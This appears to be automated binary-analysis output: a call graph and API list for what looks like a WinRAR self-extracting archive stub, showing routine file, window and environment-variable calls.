                                                                                              Total number of Limit Nodes:30
24149->24020 24150->24147 24151 c7c73f 97 API calls 24150->24151 24151->24147 24153 c6131f 24152->24153 24154 c61378 24152->24154 24156 c61385 24153->24156 24285 c6e2e8 62 API calls 2 library calls 24153->24285 24286 c6e2c1 GetWindowLongW SetWindowLongW 24154->24286 24156->23988 24156->23989 24156->23990 24158 c61341 24158->24156 24159 c61354 GetDlgItem 24158->24159 24159->24156 24160 c61364 24159->24160 24160->24156 24161 c6136a SetWindowTextW 24160->24161 24161->24156 24163 c6a0bb 24162->24163 24164 c6a14c 24163->24164 24167 c6a175 24163->24167 24287 c6a2b2 24163->24287 24165 c6a2b2 8 API calls 24164->24165 24164->24167 24165->24167 24167->24048 24167->24049 24168->24060 24170 c69678 24169->24170 24171 c696d5 CreateFileW 24170->24171 24172 c696c9 24170->24172 24171->24172 24173 c6971f 24172->24173 24174 c6bb03 GetCurrentDirectoryW 24172->24174 24173->24114 24175 c69704 24174->24175 24175->24173 24176 c69708 CreateFileW 24175->24176 24176->24173 24178 c695be 24177->24178 24183 c695cf 24177->24183 24179 c695d1 24178->24179 24180 c695ca 24178->24180 24178->24183 24313 c69620 24179->24313 24308 c6974e 24180->24308 24183->24073 24184->24092 24185->24105 24186->24123 24188 c7c749 __EH_prolog 24187->24188 24189 c7bdcf 24188->24189 24190 c7b314 ExpandEnvironmentStringsW 24188->24190 24189->24135 24199 c7c780 _wcslen _wcsrchr 24190->24199 24192 c7b314 ExpandEnvironmentStringsW 24192->24199 24193 c7ca67 SetWindowTextW 24193->24199 24196 c83e3e 22 API calls 24196->24199 24198 c7c855 SetFileAttributesW 24200 c7c90f GetFileAttributesW 24198->24200 24211 c7c86f _abort _wcslen 24198->24211 24199->24189 24199->24192 24199->24193 24199->24196 24199->24198 24204 c7cc31 GetDlgItem SetWindowTextW SendMessageW 24199->24204 24207 c7cc71 SendMessageW 24199->24207 24328 c71fbb CompareStringW 24199->24328 24329 c7a64d GetCurrentDirectoryW 24199->24329 24331 c6a5d1 6 API calls 24199->24331 24332 c6a55a FindClose 24199->24332 24333 c7b48e 76 API calls 2 library calls 24199->24333 
24200->24199 24203 c7c921 DeleteFileW 24200->24203 24203->24199 24205 c7c932 24203->24205 24204->24199 24206 c64092 _swprintf 51 API calls 24205->24206 24208 c7c952 GetFileAttributesW 24206->24208 24207->24199 24208->24205 24209 c7c967 MoveFileW 24208->24209 24209->24199 24210 c7c97f MoveFileExW 24209->24210 24210->24199 24211->24199 24211->24200 24330 c6b991 51 API calls 2 library calls 24211->24330 24213 c7da5c __EH_prolog 24212->24213 24334 c70659 24213->24334 24215 c7da8d 24338 c65b3d 24215->24338 24217 c7daab 24342 c67b0d 24217->24342 24221 c7dafe 24358 c67b9e 24221->24358 24223 c7bdee 24223->24146 24225 c7d6a8 24224->24225 24846 c7a5c6 24225->24846 24228 c7bf15 24228->23998 24228->23999 24229 c7d6b5 GetWindow 24229->24228 24232 c7d6d5 24229->24232 24230 c7d6e2 GetClassNameW 24851 c71fbb CompareStringW 24230->24851 24232->24228 24232->24230 24233 c7d706 GetWindowLongW 24232->24233 24234 c7d76a GetWindow 24232->24234 24233->24234 24235 c7d716 SendMessageW 24233->24235 24234->24228 24234->24232 24235->24234 24236 c7d72c GetObjectW 24235->24236 24852 c7a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24236->24852 24238 c7d743 24853 c7a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24238->24853 24854 c7a80c 8 API calls 24238->24854 24241 c7d754 SendMessageW DeleteObject 24241->24234 24242->24009 24244 c7abf1 24243->24244 24245 c7abcc 24243->24245 24246 c7abf6 SHAutoComplete 24244->24246 24247 c7abff 24244->24247 24857 c71fbb CompareStringW 24245->24857 24246->24247 24251 c7b093 24247->24251 24249 c7abdf 24249->24244 24250 c7abe3 FindWindowExW 24249->24250 24250->24244 24252 c7b09d __EH_prolog 24251->24252 24253 c613dc 84 API calls 24252->24253 24254 c7b0bf 24253->24254 24858 c61fdc 24254->24858 24257 c7b0eb 24259 c619af 128 API calls 24257->24259 24258 c7b0d9 24260 c61692 86 API calls 24258->24260 24263 c7b10d __InternalCxxFrameHandler ___std_exception_copy 24259->24263 24261 c7b0e4 24260->24261 24261->24039 24261->24042 24262 c61692 86 API calls 24262->24261 
24263->24262 24264->24019 24266 c7b568 5 API calls 24265->24266 24267 c7d4e0 GetDlgItem 24266->24267 24268 c7d536 SendMessageW SendMessageW 24267->24268 24269 c7d502 24267->24269 24270 c7d572 24268->24270 24271 c7d591 SendMessageW SendMessageW SendMessageW 24268->24271 24274 c7d50d ShowWindow SendMessageW SendMessageW 24269->24274 24270->24271 24272 c7d5e7 SendMessageW 24271->24272 24273 c7d5c4 SendMessageW 24271->24273 24272->24041 24273->24272 24274->24268 24275->24102 24276->24125 24277->24131 24278->24136 24279->24141 24280->24149 24281->24082 24282->24101 24283->24070 24284->24063 24285->24158 24286->24156 24288 c6a2bf 24287->24288 24289 c6a2e3 24288->24289 24290 c6a2d6 CreateDirectoryW 24288->24290 24291 c6a231 3 API calls 24289->24291 24290->24289 24292 c6a316 24290->24292 24293 c6a2e9 24291->24293 24295 c6a325 24292->24295 24300 c6a4ed 24292->24300 24294 c6a329 GetLastError 24293->24294 24296 c6bb03 GetCurrentDirectoryW 24293->24296 24294->24295 24295->24163 24298 c6a2ff 24296->24298 24298->24294 24299 c6a303 CreateDirectoryW 24298->24299 24299->24292 24299->24294 24301 c7ec50 24300->24301 24302 c6a4fa SetFileAttributesW 24301->24302 24303 c6a510 24302->24303 24304 c6a53d 24302->24304 24305 c6bb03 GetCurrentDirectoryW 24303->24305 24304->24295 24306 c6a524 24305->24306 24306->24304 24307 c6a528 SetFileAttributesW 24306->24307 24307->24304 24309 c69781 24308->24309 24310 c69757 24308->24310 24309->24183 24310->24309 24319 c6a1e0 24310->24319 24314 c6962c 24313->24314 24317 c6964a 24313->24317 24316 c69638 CloseHandle 24314->24316 24314->24317 24315 c69669 24315->24183 24316->24317 24317->24315 24327 c66bd5 76 API calls 24317->24327 24320 c7ec50 24319->24320 24321 c6a1ed DeleteFileW 24320->24321 24322 c6a200 24321->24322 24323 c6977f 24321->24323 24324 c6bb03 GetCurrentDirectoryW 24322->24324 24323->24183 24325 c6a214 24324->24325 24325->24323 24326 c6a218 DeleteFileW 24325->24326 24326->24323 24327->24315 24328->24199 24329->24199 24330->24211 24331->24199 
24332->24199 24333->24199 24335 c70666 _wcslen 24334->24335 24362 c617e9 24335->24362 24337 c7067e 24337->24215 24339 c70659 _wcslen 24338->24339 24340 c617e9 78 API calls 24339->24340 24341 c7067e 24340->24341 24341->24217 24343 c67b17 __EH_prolog 24342->24343 24379 c6ce40 24343->24379 24345 c67b32 24385 c7eb38 24345->24385 24347 c67b5c 24394 c74a76 24347->24394 24350 c67c7d 24351 c67c87 24350->24351 24353 c67cf1 24351->24353 24426 c6a56d 24351->24426 24355 c67d50 24353->24355 24404 c68284 24353->24404 24354 c67d92 24354->24221 24355->24354 24432 c6138b 74 API calls 24355->24432 24359 c67bac 24358->24359 24361 c67bb3 24358->24361 24360 c72297 86 API calls 24359->24360 24360->24361 24363 c6185a __InternalCxxFrameHandler 24362->24363 24364 c617ff 24362->24364 24363->24337 24365 c61828 24364->24365 24375 c66c36 76 API calls __vswprintf_c_l 24364->24375 24367 c61887 24365->24367 24372 c61847 ___std_exception_copy 24365->24372 24369 c83e3e 22 API calls 24367->24369 24368 c6181e 24376 c66ca7 75 API calls 24368->24376 24371 c6188e 24369->24371 24371->24363 24378 c66ca7 75 API calls 24371->24378 24372->24363 24377 c66ca7 75 API calls 24372->24377 24375->24368 24376->24365 24377->24363 24378->24363 24380 c6ce4a __EH_prolog 24379->24380 24381 c7eb38 8 API calls 24380->24381 24382 c6ce8d 24381->24382 24383 c7eb38 8 API calls 24382->24383 24384 c6ceb1 24383->24384 24384->24345 24387 c7eb3d ___std_exception_copy 24385->24387 24386 c7eb57 24386->24347 24387->24386 24390 c7eb59 24387->24390 24400 c87a5e 7 API calls 2 library calls 24387->24400 24389 c7f5c9 24402 c8238d RaiseException 24389->24402 24390->24389 24401 c8238d RaiseException 24390->24401 24393 c7f5e6 24395 c74a80 __EH_prolog 24394->24395 24396 c7eb38 8 API calls 24395->24396 24397 c74a9c 24396->24397 24398 c67b8b 24397->24398 24403 c70e46 80 API calls 24397->24403 24398->24350 24400->24387 24401->24389 24402->24393 24403->24398 24405 c6828e __EH_prolog 24404->24405 24433 c613dc 24405->24433 24407 c682aa 24408 c682bb 
24407->24408 24576 c69f42 24407->24576 24411 c682f2 24408->24411 24441 c61a04 24408->24441 24572 c61692 24411->24572 24414 c68389 24460 c68430 24414->24460 24418 c683e8 24468 c61f6d 24418->24468 24420 c682ee 24420->24411 24420->24414 24424 c6a56d 7 API calls 24420->24424 24580 c6c0c5 CompareStringW _wcslen 24420->24580 24422 c683f3 24422->24411 24472 c63b2d 24422->24472 24484 c6848e 24422->24484 24424->24420 24427 c6a582 24426->24427 24428 c6a5b0 24427->24428 24835 c6a69b 24427->24835 24428->24351 24430 c6a592 24430->24428 24431 c6a597 FindClose 24430->24431 24431->24428 24432->24354 24434 c613e1 __EH_prolog 24433->24434 24435 c6ce40 8 API calls 24434->24435 24436 c61419 24435->24436 24437 c7eb38 8 API calls 24436->24437 24440 c61474 _abort 24436->24440 24438 c61461 24437->24438 24439 c6b505 84 API calls 24438->24439 24438->24440 24439->24440 24440->24407 24442 c61a0e __EH_prolog 24441->24442 24454 c61a61 24442->24454 24457 c61b9b 24442->24457 24581 c613ba 24442->24581 24444 c61bc7 24593 c6138b 74 API calls 24444->24593 24447 c63b2d 101 API calls 24451 c61c12 24447->24451 24448 c61bd4 24448->24447 24448->24457 24449 c61c5a 24453 c61c8d 24449->24453 24449->24457 24594 c6138b 74 API calls 24449->24594 24451->24449 24452 c63b2d 101 API calls 24451->24452 24452->24451 24453->24457 24458 c69e80 79 API calls 24453->24458 24454->24444 24454->24448 24454->24457 24455 c63b2d 101 API calls 24456 c61cde 24455->24456 24456->24455 24456->24457 24457->24420 24458->24456 24614 c6cf3d 24460->24614 24462 c68440 24618 c713d2 GetSystemTime SystemTimeToFileTime 24462->24618 24464 c683a3 24464->24418 24465 c71b66 24464->24465 24623 c7de6b 24465->24623 24469 c61f72 __EH_prolog 24468->24469 24471 c61fa6 24469->24471 24631 c619af 24469->24631 24471->24422 24473 c63b3d 24472->24473 24474 c63b39 24472->24474 24483 c69e80 79 API calls 24473->24483 24474->24422 24475 c63b4f 24476 c63b78 24475->24476 24478 c63b6a 24475->24478 24762 c6286b 101 API calls 3 library calls 24476->24762 24479 c63baa 
24478->24479 24761 c632f7 89 API calls 2 library calls 24478->24761 24479->24422 24481 c63b76 24481->24479 24763 c620d7 74 API calls 24481->24763 24483->24475 24485 c68498 __EH_prolog 24484->24485 24490 c684d5 24485->24490 24495 c68513 24485->24495 24788 c78c8d 103 API calls 24485->24788 24487 c684f5 24488 c6851c 24487->24488 24489 c684fa 24487->24489 24488->24495 24790 c78c8d 103 API calls 24488->24790 24489->24495 24789 c67a0d 152 API calls 24489->24789 24490->24487 24494 c6857a 24490->24494 24490->24495 24494->24495 24764 c65d1a 24494->24764 24495->24422 24496 c68605 24496->24495 24770 c68167 24496->24770 24499 c68797 24500 c6a56d 7 API calls 24499->24500 24501 c68802 24499->24501 24500->24501 24776 c67c0d 24501->24776 24503 c6d051 82 API calls 24504 c6885d 24503->24504 24504->24495 24504->24503 24505 c6898b 24504->24505 24507 c68992 24504->24507 24791 c68117 84 API calls 24504->24791 24792 c62021 74 API calls 24504->24792 24793 c62021 74 API calls 24505->24793 24506 c68a5f 24511 c68ab6 24506->24511 24524 c68a6a 24506->24524 24507->24506 24510 c689e1 24507->24510 24514 c68b14 24510->24514 24517 c68a4c 24510->24517 24519 c6a231 3 API calls 24510->24519 24511->24517 24796 c67fc0 97 API calls 24511->24796 24512 c68ab4 24518 c6959a 80 API calls 24512->24518 24513 c69105 24516 c6959a 80 API calls 24513->24516 24514->24513 24532 c68b82 24514->24532 24797 c698bc 24514->24797 24516->24495 24517->24512 24517->24514 24518->24495 24520 c68a19 24519->24520 24520->24517 24794 c692a3 97 API calls 24520->24794 24522 c6ab1a 8 API calls 24525 c68bd1 24522->24525 24524->24512 24795 c67db2 101 API calls 24524->24795 24526 c6ab1a 8 API calls 24525->24526 24546 c68be7 24526->24546 24530 c68b70 24801 c66e98 77 API calls 24530->24801 24532->24522 24533 c68cbc 24534 c68e40 24533->24534 24535 c68d18 24533->24535 24538 c68e66 24534->24538 24539 c68e52 24534->24539 24558 c68d49 24534->24558 24536 c68d8a 24535->24536 24537 c68d28 24535->24537 24543 c68167 19 API calls 24536->24543 24540 
c68d6e 24537->24540 24547 c68d37 24537->24547 24542 c73377 75 API calls 24538->24542 24541 c69215 123 API calls 24539->24541 24540->24558 24804 c677b8 111 API calls 24540->24804 24541->24558 24544 c68e7f 24542->24544 24548 c68dbd 24543->24548 24807 c73020 123 API calls 24544->24807 24545 c68c93 24545->24533 24802 c69a3c 82 API calls 24545->24802 24546->24533 24546->24545 24552 c6981a 79 API calls 24546->24552 24803 c62021 74 API calls 24547->24803 24554 c68de6 24548->24554 24555 c68df5 24548->24555 24548->24558 24552->24545 24805 c67542 85 API calls 24554->24805 24806 c69155 93 API calls __EH_prolog 24555->24806 24561 c68f85 24558->24561 24808 c62021 74 API calls 24558->24808 24560 c69090 24560->24513 24563 c6a4ed 3 API calls 24560->24563 24561->24513 24561->24560 24562 c6903e 24561->24562 24782 c69f09 SetEndOfFile 24561->24782 24783 c69da2 24562->24783 24566 c690eb 24563->24566 24566->24513 24809 c62021 74 API calls 24566->24809 24567 c69085 24569 c69620 77 API calls 24567->24569 24569->24560 24570 c690fb 24810 c66dcb 76 API calls 24570->24810 24574 c616a4 24572->24574 24826 c6cee1 24574->24826 24577 c69f59 24576->24577 24578 c69f63 24577->24578 24834 c66d0c 78 API calls 24577->24834 24578->24408 24580->24420 24595 c61732 24581->24595 24583 c613d6 24584 c69e80 24583->24584 24585 c69e92 24584->24585 24588 c69ea5 24584->24588 24590 c69eb0 24585->24590 24612 c66d5b 77 API calls 24585->24612 24586 c69eb8 SetFilePointer 24589 c69ed4 GetLastError 24586->24589 24586->24590 24588->24586 24588->24590 24589->24590 24591 c69ede 24589->24591 24590->24454 24591->24590 24613 c66d5b 77 API calls 24591->24613 24593->24457 24594->24453 24596 c61748 24595->24596 24607 c617a0 __InternalCxxFrameHandler 24595->24607 24597 c61771 24596->24597 24608 c66c36 76 API calls __vswprintf_c_l 24596->24608 24599 c617c7 24597->24599 24604 c6178d ___std_exception_copy 24597->24604 24601 c83e3e 22 API calls 24599->24601 24600 c61767 24609 c66ca7 75 API calls 24600->24609 24603 c617ce 24601->24603 
24603->24607 24611 c66ca7 75 API calls 24603->24611 24604->24607 24610 c66ca7 75 API calls 24604->24610 24607->24583 24608->24600 24609->24597 24610->24607 24611->24607 24612->24588 24613->24590 24615 c6cf4d 24614->24615 24617 c6cf54 24614->24617 24619 c6981a 24615->24619 24617->24462 24618->24464 24620 c69833 24619->24620 24622 c69e80 79 API calls 24620->24622 24621 c69865 24621->24617 24622->24621 24624 c7de78 24623->24624 24625 c6e617 53 API calls 24624->24625 24626 c7de9b 24625->24626 24627 c64092 _swprintf 51 API calls 24626->24627 24628 c7dead 24627->24628 24629 c7d4d4 16 API calls 24628->24629 24630 c71b7c 24629->24630 24630->24418 24632 c619bf 24631->24632 24634 c619bb 24631->24634 24635 c618f6 24632->24635 24634->24471 24636 c61908 24635->24636 24637 c61945 24635->24637 24638 c63b2d 101 API calls 24636->24638 24643 c63fa3 24637->24643 24642 c61928 24638->24642 24642->24634 24646 c63fac 24643->24646 24644 c63b2d 101 API calls 24644->24646 24645 c61966 24645->24642 24648 c61e50 24645->24648 24646->24644 24646->24645 24660 c70e08 24646->24660 24649 c61e5a __EH_prolog 24648->24649 24668 c63bba 24649->24668 24651 c61e84 24652 c61732 78 API calls 24651->24652 24654 c61f0b 24651->24654 24653 c61e9b 24652->24653 24696 c618a9 78 API calls 24653->24696 24654->24642 24656 c61eb3 24658 c61ebf _wcslen 24656->24658 24697 c71b84 MultiByteToWideChar 24656->24697 24698 c618a9 78 API calls 24658->24698 24661 c70e0f 24660->24661 24662 c70e2a 24661->24662 24666 c66c31 RaiseException _com_raise_error 24661->24666 24664 c70e3b SetThreadExecutionState 24662->24664 24667 c66c31 RaiseException _com_raise_error 24662->24667 24664->24646 24666->24662 24667->24664 24669 c63bc4 __EH_prolog 24668->24669 24670 c63bf6 24669->24670 24671 c63bda 24669->24671 24673 c63e51 24670->24673 24676 c63c22 24670->24676 24724 c6138b 74 API calls 24671->24724 24741 c6138b 74 API calls 24673->24741 24675 c63be5 24675->24651 24676->24675 24699 c73377 24676->24699 24678 c63ca3 24679 c63d2e 24678->24679 
24695 c63c9a 24678->24695 24727 c6d051 24678->24727 24709 c6ab1a 24679->24709 24680 c63c9f 24680->24678 24726 c620bd 78 API calls 24680->24726 24682 c63c71 24682->24678 24682->24680 24683 c63c8f 24682->24683 24725 c6138b 74 API calls 24683->24725 24687 c63d41 24689 c63dd7 24687->24689 24690 c63dc7 24687->24690 24733 c73020 123 API calls 24689->24733 24713 c69215 24690->24713 24693 c63dd5 24693->24695 24734 c62021 74 API calls 24693->24734 24735 c72297 24695->24735 24696->24656 24697->24658 24698->24654 24700 c7338c 24699->24700 24702 c73396 ___std_exception_copy 24699->24702 24742 c66ca7 75 API calls 24700->24742 24703 c734c6 24702->24703 24704 c7341c 24702->24704 24708 c73440 _abort 24702->24708 24744 c8238d RaiseException 24703->24744 24743 c732aa 75 API calls 3 library calls 24704->24743 24707 c734f2 24708->24682 24710 c6ab28 24709->24710 24712 c6ab32 24709->24712 24711 c7eb38 8 API calls 24710->24711 24711->24712 24712->24687 24714 c6921f __EH_prolog 24713->24714 24745 c67c64 24714->24745 24717 c613ba 78 API calls 24718 c69231 24717->24718 24748 c6d114 24718->24748 24720 c6928a 24720->24693 24722 c6d114 118 API calls 24723 c69243 24722->24723 24723->24720 24723->24722 24757 c6d300 97 API calls __InternalCxxFrameHandler 24723->24757 24724->24675 24725->24695 24726->24678 24728 c6d084 24727->24728 24729 c6d072 24727->24729 24759 c6603a 82 API calls 24728->24759 24758 c6603a 82 API calls 24729->24758 24732 c6d07c 24732->24679 24733->24693 24734->24695 24737 c722a1 24735->24737 24736 c722ba 24760 c70eed 86 API calls 24736->24760 24737->24736 24740 c722ce 24737->24740 24739 c722c1 24739->24740 24741->24675 24742->24702 24743->24708 24744->24707 24746 c6b146 GetVersionExW 24745->24746 24747 c67c69 24746->24747 24747->24717 24753 c6d12a __InternalCxxFrameHandler 24748->24753 24749 c6d29a 24750 c6d2ce 24749->24750 24751 c6d0cb 6 API calls 24749->24751 24752 c70e08 SetThreadExecutionState RaiseException 24750->24752 24751->24750 24755 c6d291 24752->24755 24753->24749 
24754 c78c8d 103 API calls 24753->24754 24753->24755 24756 c6ac05 91 API calls 24753->24756 24754->24753 24755->24723 24756->24753 24757->24723 24758->24732 24759->24732 24760->24739 24761->24481 24762->24481 24763->24479 24765 c65d2a 24764->24765 24811 c65c4b 24765->24811 24767 c65d95 24767->24496 24768 c65d5d 24768->24767 24816 c6b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24768->24816 24771 c68186 24770->24771 24772 c68232 24771->24772 24823 c6be5e 19 API calls __InternalCxxFrameHandler 24771->24823 24822 c71fac CharUpperW 24772->24822 24775 c6823b 24775->24499 24777 c67c22 24776->24777 24778 c67c5a 24777->24778 24824 c66e7a 74 API calls 24777->24824 24778->24504 24780 c67c52 24825 c6138b 74 API calls 24780->24825 24782->24562 24784 c69db3 24783->24784 24786 c69dc2 24783->24786 24785 c69db9 FlushFileBuffers 24784->24785 24784->24786 24785->24786 24787 c69e3f SetFileTime 24786->24787 24787->24567 24788->24490 24789->24495 24790->24495 24791->24504 24792->24504 24793->24507 24794->24517 24795->24512 24796->24517 24798 c698c5 GetFileType 24797->24798 24799 c68b5a 24797->24799 24798->24799 24799->24532 24800 c62021 74 API calls 24799->24800 24800->24530 24801->24532 24802->24533 24803->24558 24804->24558 24805->24558 24806->24558 24807->24558 24808->24561 24809->24570 24810->24513 24817 c65b48 24811->24817 24813 c65c6c 24813->24768 24815 c65b48 2 API calls 24815->24813 24816->24768 24820 c65b52 24817->24820 24818 c65c3a 24818->24813 24818->24815 24820->24818 24821 c6b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24820->24821 24821->24820 24822->24775 24823->24772 24824->24780 24825->24778 24827 c6cef2 24826->24827 24832 c6a99e 86 API calls 24827->24832 24829 c6cf24 24833 c6a99e 86 API calls 24829->24833 24831 c6cf2f 24832->24829 24833->24831 24834->24578 24836 c6a6a8 24835->24836 24837 c6a727 FindNextFileW 24836->24837 24838 c6a6c1 FindFirstFileW 24836->24838 24839 c6a709 24837->24839 24840 c6a732 
GetLastError 24837->24840 24838->24839 24841 c6a6d0 24838->24841 24839->24430 24840->24839 24842 c6bb03 GetCurrentDirectoryW 24841->24842 24843 c6a6e0 24842->24843 24844 c6a6e4 FindFirstFileW 24843->24844 24845 c6a6fe GetLastError 24843->24845 24844->24839 24844->24845 24845->24839 24855 c7a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24846->24855 24848 c7a5cd 24849 c7a5d9 24848->24849 24856 c7a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24848->24856 24849->24228 24849->24229 24851->24232 24852->24238 24853->24238 24854->24241 24855->24848 24856->24849 24857->24249 24859 c69f42 78 API calls 24858->24859 24860 c61fe8 24859->24860 24861 c61a04 101 API calls 24860->24861 24864 c62005 24860->24864 24862 c61ff5 24861->24862 24862->24864 24865 c6138b 74 API calls 24862->24865 24864->24257 24864->24258 24865->24864 24866 c613e1 84 API calls 2 library calls 25411 c794e0 GetClientRect 25412 c7f2e0 46 API calls __RTC_Initialize 25462 c721e0 26 API calls std::bad_exception::bad_exception 25413 c8bee0 GetCommandLineA GetCommandLineW 25464 c6f1e8 FreeLibrary 25415 c82cfb 38 API calls 4 library calls 25416 c65ef0 82 API calls 25465 c695f0 80 API calls 25466 c7fd4f 9 API calls 2 library calls 24882 c898f0 24890 c8adaf 24882->24890 24885 c89904 24887 c8990c 24888 c89919 24887->24888 24898 c89920 11 API calls 24887->24898 24891 c8ac98 _unexpected 5 API calls 24890->24891 24892 c8add6 24891->24892 24893 c8adee TlsAlloc 24892->24893 24894 c8addf 24892->24894 24893->24894 24895 c7fbbc _ValidateLocalCookies 5 API calls 24894->24895 24896 c898fa 24895->24896 24896->24885 24897 c89869 20 API calls 2 library calls 24896->24897 24897->24887 24898->24885 24899 c8abf0 24900 c8abfb 24899->24900 24902 c8ac24 24900->24902 24904 c8ac20 24900->24904 24905 c8af0a 24900->24905 24912 c8ac50 DeleteCriticalSection 24902->24912 24906 c8ac98 _unexpected 5 API calls 24905->24906 24907 c8af31 24906->24907 24908 c8af4f InitializeCriticalSectionAndSpinCount 24907->24908 24909 c8af3a 24907->24909 
24908->24909 24910 c7fbbc _ValidateLocalCookies 5 API calls 24909->24910 24911 c8af66 24910->24911 24911->24900 24912->24904 25417 c888f0 7 API calls ___scrt_uninitialize_crt 25418 c7c793 102 API calls 4 library calls 25469 c79580 6 API calls 25471 c7b18d 78 API calls 25420 c7c793 97 API calls 4 library calls 25473 c7eda7 48 API calls _unexpected 25422 c7dca1 DialogBoxParamW 25475 c7f3a0 27 API calls 25425 c8a4a0 71 API calls _free 25426 c8a6a0 31 API calls 2 library calls 25427 c908a0 IsProcessorFeaturePresent 25476 c66faa 111 API calls 3 library calls 25477 c8b1b8 27 API calls 2 library calls 24950 c7f3b2 24951 c7f3be __FrameHandler3::FrameUnwindToState 24950->24951 24982 c7eed7 24951->24982 24953 c7f3c5 24954 c7f518 24953->24954 24957 c7f3ef 24953->24957 25055 c7f838 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter _abort 24954->25055 24956 c7f51f 25048 c87f58 24956->25048 24968 c7f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24957->24968 24993 c88aed 24957->24993 24964 c7f40e 24966 c7f48f 25001 c7f953 GetStartupInfoW _abort 24966->25001 24968->24966 25051 c87af4 38 API calls 2 library calls 24968->25051 24969 c7f495 25002 c88a3e 51 API calls 24969->25002 24972 c7f49d 25003 c7df1e 24972->25003 24976 c7f4b1 24976->24956 24978 c7f4b5 24976->24978 24977 c7f4be 25054 c7f048 12 API calls ___scrt_uninitialize_crt 24977->25054 24978->24977 25053 c87efb 28 API calls _abort 24978->25053 24981 c7f4c6 24981->24964 24983 c7eee0 24982->24983 25057 c7f654 IsProcessorFeaturePresent 24983->25057 24985 c7eeec 25058 c82a5e 24985->25058 24987 c7eef1 24988 c7eef5 24987->24988 25066 c88977 24987->25066 24988->24953 24991 c7ef0c 24991->24953 24994 c88b04 24993->24994 24995 c7fbbc _ValidateLocalCookies 5 API calls 24994->24995 24996 c7f408 24995->24996 24996->24964 24997 c88a91 24996->24997 24999 c88ac0 24997->24999 24998 c7fbbc _ValidateLocalCookies 5 API calls 25000 c88ae9 24998->25000 24999->24998 
25000->24968 25001->24969 25002->24972 25117 c70863 25003->25117 25007 c7df3d 25166 c7ac16 25007->25166 25009 c7df46 _abort 25010 c7df59 GetCommandLineW 25009->25010 25011 c7dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 25010->25011 25012 c7df68 25010->25012 25013 c64092 _swprintf 51 API calls 25011->25013 25170 c7c5c4 25012->25170 25015 c7e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 25013->25015 25181 c7b6dd LoadBitmapW 25015->25181 25018 c7df76 OpenFileMappingW 25021 c7dfd6 CloseHandle 25018->25021 25022 c7df8f MapViewOfFile 25018->25022 25019 c7dfe0 25175 c7dbde 25019->25175 25021->25011 25025 c7dfa0 __InternalCxxFrameHandler 25022->25025 25026 c7dfcd UnmapViewOfFile 25022->25026 25030 c7dbde 2 API calls 25025->25030 25026->25021 25032 c7dfbc 25030->25032 25031 c790b7 8 API calls 25033 c7e0aa DialogBoxParamW 25031->25033 25032->25026 25034 c7e0e4 25033->25034 25035 c7e0f6 Sleep 25034->25035 25036 c7e0fd 25034->25036 25035->25036 25038 c7e10b 25036->25038 25211 c7ae2f CompareStringW SetCurrentDirectoryW _abort _wcslen 25036->25211 25039 c7e12a DeleteObject 25038->25039 25040 c7e146 25039->25040 25041 c7e13f DeleteObject 25039->25041 25042 c7e177 25040->25042 25043 c7e189 25040->25043 25041->25040 25212 c7dc3b 6 API calls 25042->25212 25208 c7ac7c 25043->25208 25045 c7e17d CloseHandle 25045->25043 25047 c7e1c3 25052 c7f993 GetModuleHandleW 25047->25052 25344 c87cd5 25048->25344 25051->24966 25052->24976 25053->24977 25054->24981 25055->24956 25057->24985 25070 c83b07 25058->25070 25061 c82a67 25061->24987 25063 c82a6f 25064 c82a7a 25063->25064 25084 c83b43 DeleteCriticalSection 25063->25084 25064->24987 25113 c8c05a 25066->25113 25069 c82a7d 7 API calls 2 library calls 25069->24988 25071 c83b10 25070->25071 25073 c83b39 25071->25073 25075 c82a63 25071->25075 25085 c83d46 25071->25085 25090 c83b43 DeleteCriticalSection 25073->25090 25075->25061 25076 c82b8c 25075->25076 25106 c83c57 25076->25106 25080 c82bbc 25080->25063 25081 c82baf 

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 00C70863: GetModuleHandleW.KERNEL32(kernel32), ref: 00C7087C
                                                                                                • Part of subcall function 00C70863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C7088E
                                                                                                • Part of subcall function 00C70863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C708BF
                                                                                                • Part of subcall function 00C7A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00C7A655
                                                                                                • Part of subcall function 00C7AC16: OleInitialize.OLE32(00000000), ref: 00C7AC2F
                                                                                                • Part of subcall function 00C7AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7AC66
                                                                                                • Part of subcall function 00C7AC16: SHGetMalloc.SHELL32(00CA8438), ref: 00C7AC70
                                                                                              • GetCommandLineW.KERNEL32 ref: 00C7DF5C
                                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00C7DF83
                                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00C7DF94
                                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00C7DFCE
                                                                                                • Part of subcall function 00C7DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C7DBF4
                                                                                                • Part of subcall function 00C7DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C7DC30
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00C7DFD7
                                                                                              • GetModuleFileNameW.KERNEL32(00000000,00CBEC90,00000800), ref: 00C7DFF2
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00CBEC90), ref: 00C7DFFE
                                                                                              • GetLocalTime.KERNEL32(?), ref: 00C7E009
                                                                                              • _swprintf.LIBCMT ref: 00C7E048
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00C7E05A
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00C7E061
                                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00C7E078
